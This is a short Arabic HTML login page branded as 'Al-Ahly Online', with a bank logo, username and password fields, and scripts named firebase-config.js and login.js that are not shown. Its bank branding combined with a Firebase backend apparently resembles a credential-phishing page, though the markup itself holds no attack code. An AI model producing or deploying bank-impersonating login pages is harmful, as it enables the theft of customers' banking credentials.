
<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
  <meta charset="UTF-8">
  <title>تسجيل الدخول - الأهلي أونلاين</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  <div class="container">
    <img src="logo.png" alt="شعار البنك الأهلي" class="logo" />
    <h2>تسجيل الدخول</h2>
    <form id="loginForm">
      <input type="text" placeholder="اسم المستخدم" id="username" required><br>
      <input type="password" placeholder="كلمة المرور" id="password" required><br>
      <button type="submit">تسجيل الدخول</button>
    </form>
  </div>
  <script src="firebase-config.js"></script>
  <script src="login.js"></script>
</body>
</html>
